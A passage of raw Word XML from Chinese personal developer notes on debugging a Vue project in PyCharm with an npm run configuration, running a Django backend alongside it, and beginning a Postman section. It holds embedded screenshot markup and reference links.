        <w:t>解释器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件包管理器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> npm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1C0722" w14:textId="77777777" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F747B1A" w14:textId="6DF2FA17" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D713F64" wp14:editId="25868146">
            <wp:extent cx="5274310" cy="3082925"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="520153465" name="图片 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53465" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3082925"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF3CF6" w14:textId="77777777" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCA12F2" w14:textId="372F5C41" w:rsidR="0065362F" w:rsidRDefault="0026586A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？？这里没研究完，需要补充。</w:t>
      </w:r>
      <w:r w:rsidR="00E7551B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我想能调试</w:t>
      </w:r>
      <w:r w:rsidR="00E7551B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="00E7551B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E7551B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vue</w:t>
      </w:r>
      <w:r w:rsidR="00E7551B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39E7E5" w14:textId="77777777" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29385DBD" w14:textId="77777777" w:rsidR="0065362F" w:rsidRDefault="0065362F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3FA23C" w14:textId="5B5A9855" w:rsidR="00F8705A" w:rsidRDefault="00F8705A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后来运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + shift </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DCFA50" w14:textId="66EF7D03" w:rsidR="00F8705A" w:rsidRDefault="00F8705A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是下面这种的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65711F37" w14:textId="5E444ED5" w:rsidR="00F8705A" w:rsidRDefault="00F8705A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D9133F1" wp14:editId="0099E637">
            <wp:extent cx="5274310" cy="3265170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="633656561" name="图片 1" descr="电脑的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56561" name="图片 1" descr="电脑的屏幕截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3265170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF9BBB3" w14:textId="42840E71" w:rsidR="00F8705A" w:rsidRDefault="00F8705A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F2AEC27" wp14:editId="1ECAE941">
            <wp:extent cx="5274310" cy="3371215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="943110937" name="图片 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10937" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId303"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3371215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4B21C" w14:textId="77777777" w:rsidR="00F8705A" w:rsidRDefault="00F8705A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB19288" w14:textId="519A80BE" w:rsidR="007136EE" w:rsidRDefault="007136EE" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="844" w:name="_Toc159780264"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r w:rsidR="009B4FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（鸡肋，不如</w:t>
      </w:r>
      <w:r w:rsidR="009B4FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vscode</w:t>
      </w:r>
      <w:r w:rsidR="009B4FF9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="844"/>
    </w:p>
    <w:p w14:paraId="24674004" w14:textId="2176B306" w:rsidR="007136EE" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC0540C" w14:textId="31BBD5FB" w:rsidR="007136EE" w:rsidRDefault="007136EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007136EE">
        <w:t>https://sliu.vip/web/vue-pycharm/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEA54D2" w14:textId="77777777" w:rsidR="007136EE" w:rsidRDefault="007136EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E77203C" w14:textId="4D780B1B" w:rsidR="007136EE" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> vue</w:t>
      </w:r>
      <w:r>
        <w:t>.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1C09A8" w14:textId="77777777" w:rsidR="009E3310" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519EC732" w14:textId="010BDEC5" w:rsidR="009E3310" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后调试器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的调试器，配置如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EBFE12" w14:textId="77777777" w:rsidR="009E3310" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52C9A479" w14:textId="70ACD1D4" w:rsidR="007136EE" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30FAA3C2" wp14:editId="06B2BE39">
            <wp:extent cx="5274310" cy="3395980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3698136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13631" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId304"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3395980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA94D87" w14:textId="5800185F" w:rsidR="007136EE" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行调试器，出现正常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> npm run dev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的界面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F565B43" w14:textId="17E7113E" w:rsidR="007136EE" w:rsidRDefault="009E3310" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="168D308C" wp14:editId="1A05B7F8">
            <wp:extent cx="5274310" cy="3169285"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16685573" name="图片 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573" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId305"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3169285"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB442C" w14:textId="77777777" w:rsidR="007136EE" w:rsidRDefault="007136EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51743B64" w14:textId="20029068" w:rsidR="007136EE" w:rsidRDefault="00AC686C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ctrl + shift </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1F1E4" w14:textId="77777777" w:rsidR="007136EE" w:rsidRDefault="007136EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37678360" w14:textId="2D9F210E" w:rsidR="007136EE" w:rsidRPr="007136EE" w:rsidRDefault="00DC47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>啊这，这种调试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会话。。。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEC1F2C" w14:textId="4FD664AD" w:rsidR="0065362F" w:rsidRPr="00A52B6E" w:rsidRDefault="00DC47FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EE12C98" wp14:editId="19A2A312">
            <wp:extent cx="5274310" cy="3317875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="46771869" name="图片 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1869" name="图片 1" descr="电脑萤幕的截图&#10;&#10;描述已自动生成"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId306"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3317875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="359E1C3D" w14:textId="77777777" w:rsidR="00873F30" w:rsidRPr="00A52B6E" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CEA0922" w14:textId="77777777" w:rsidR="00873F30" w:rsidRDefault="00873F30" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EEF8B49" w14:textId="448E206D" w:rsidR="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="845" w:name="_Toc159780265"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的后端和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的前端</w:t>
      </w:r>
      <w:bookmarkEnd w:id="845"/>
    </w:p>
    <w:p w14:paraId="0A23C496" w14:textId="77777777" w:rsidR="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A05B20A" w14:textId="0D24C449" w:rsidR="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置上面所说的运行器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>django</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> VUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run dev </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA0BFE0" w14:textId="6C274E78" w:rsidR="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以同时在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pycharm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BE2FFD" w14:textId="77777777" w:rsidR="000909D8" w:rsidRDefault="000909D8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC35EBC" w14:textId="4E637011" w:rsidR="000909D8" w:rsidRDefault="00A32BA7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="846" w:name="_Toc159780266"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDEA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:bookmarkEnd w:id="846"/>
    </w:p>
    <w:p w14:paraId="66A3CF96" w14:textId="77C3C6FB" w:rsidR="00A32BA7" w:rsidRDefault="00A32BA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00A32BA7">
        <w:t>https://blog.csdn.net/hxj0323/article/details/109208253</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F37EB5" w14:textId="77777777" w:rsidR="00A32BA7" w:rsidRDefault="00A32BA7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745FE247" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5D6CCE" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D2A6F9" w14:textId="77777777" w:rsidR="00C6541E" w:rsidRDefault="00C6541E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E95721" w14:textId="6091182F" w:rsidR="00A32BA7" w:rsidRDefault="00AD0910" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="847" w:name="_Toc159780267"/>
      <w:r>
        <w:t>postman</w:t>
      </w:r>
      <w:bookmarkEnd w:id="847"/>
    </w:p>
    <w:p w14:paraId="1A3B5B97" w14:textId="3F9807BA" w:rsidR="00AD0910" w:rsidRDefault="003F0E0E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="848" w:name="_Toc159780268"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据本地化</w:t>
      </w:r>
      <w:bookmarkEnd w:id="848"/>
    </w:p>
    <w:p w14:paraId="4F613954" w14:textId="1E3B45A4" w:rsidR="00AD0910" w:rsidRDefault="00AD0910" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时候无法连接网络，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>postman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
